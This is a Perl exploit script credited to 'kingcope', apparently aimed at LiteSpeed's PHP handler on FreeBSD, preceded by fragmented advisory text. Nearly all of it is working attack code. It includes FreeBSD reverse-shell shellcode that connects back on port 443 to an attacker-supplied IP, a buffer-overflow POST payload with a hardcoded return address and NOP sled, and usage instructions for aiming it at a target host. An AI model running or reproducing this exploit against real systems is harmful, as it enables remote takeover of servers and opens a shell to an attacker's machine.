FreeBSD
Standard & Enterprise x86
Standard & Enterprise x86
Standard x86
too
compiled version
compiled SAPI version)
enabled,
at the end of
exploitable, but then
FreeBSD targets only.
boxes
(http://litespeedtech.com/packages/lsapi/php-litespeed-5.4.tgz)
use IO::Socket;
$|=1;
#freebsd reverse shell port 443
#setup a netcat on this port ^^
$bsdcbsc =
# setreuid, no root here
"\x31\xc0\x31\xc0\x50\x31\xc0\x50\xb0\x7e\x50\xcd\x80".
# connect back :>
"\x31\xc0\x31\xdb\x53\xb3\x06\x53".
"\xb3\x01\x53\xb3\x02\x53\x54\xb0".
"\x61\xcd\x80\x31\xd2\x52\x52\x68".
"\x41\x41\x41\x41\x66\x68\x01\xbb".
"\xb7\x02\x66\x53\x89\xe1\xb2\x10".
"\x52\x51\x50\x52\x89\xc2\x31\xc0".
"\xb0\x62\xcd\x80\x31\xdb\x39\xc3".
"\x74\x06\x31\xc0\xb0\x01\xcd\x80".
"\x31\xc0\x50\x52\x50\xb0\x5a\xcd".
"\x80\x31\xc0\x31\xdb\x43\x53\x52".
"\x50\xb0\x5a\xcd\x80\x31\xc0\x43".
"\x53\x52\x50\xb0\x5a\xcd\x80\x31".
"\xc0\x50\x68\x2f\x2f\x73\x68\x68".
"\x2f\x62\x69\x6e\x89\xe3\x50\x54".
"\x53\x50\xb0\x3b\xcd\x80\x31\xc0".
"\xb0\x01\xcd\x80";
sub usage() {
print "written by kingcope\n";
print "usage:\n".
"litespeed-remote.pl <target ip/host>
<target port>
<your ip> <php file on remote host>\n\n".
"example:\n".
"perl litespeed-remote.pl 192.168.2.3
8088
192.168.2.2 phpinfo.php\n\n";
exit;
}
if ($#ARGV ne 3) { usage; }
$target = $ARGV[0];
$port = $ARGV[1];
$cbip = $ARGV[2];
$file = $ARGV[3];
($a1, $a2, $a3, $a4) = split(//, gethostbyname("$cbip"));
substr($bsdcbsc, 37, 4, $a1 . $a2 . $a3 . $a4);
#my $sock = IO::Socket::INET->new(PeerAddr => $target,
'tcp');
#$a = "A" x 500;
#print $sock "POST /phpinfo.php HTTP/1.1\r\nHost:
192.168.2.5\r\n\r\n";
#$x = <stdin>;
#$ret = pack("V", 0x28469478); # FreeBSD 7.3-RELEASE
#$ret = pack("V", 0x82703c0); # FreeBSD 6.3-RELEASE
$ret = pack("V", 0x080F40CD); # JMP EDX lsphp
my $sock = IO::Socket::INET->new(PeerAddr => $target,
PeerPort => $port,
Proto =>
'tcp');
$a = "A" x 263 . "AAAA" x 6 . $ret . "C" x 500;
$sc = "\x90" x 3000 . $bsdcbsc;
print $sock "POST
/\x90\x90\x90\x90\x90\x90\xeb\x50/…/$file?
HTTP/1.1\r\nHost: $target\r\nVVVV: $sc\r\n$a
KINGCOPEH4XXU:\r\n\r\n";
while (<$sock>) {
print;
}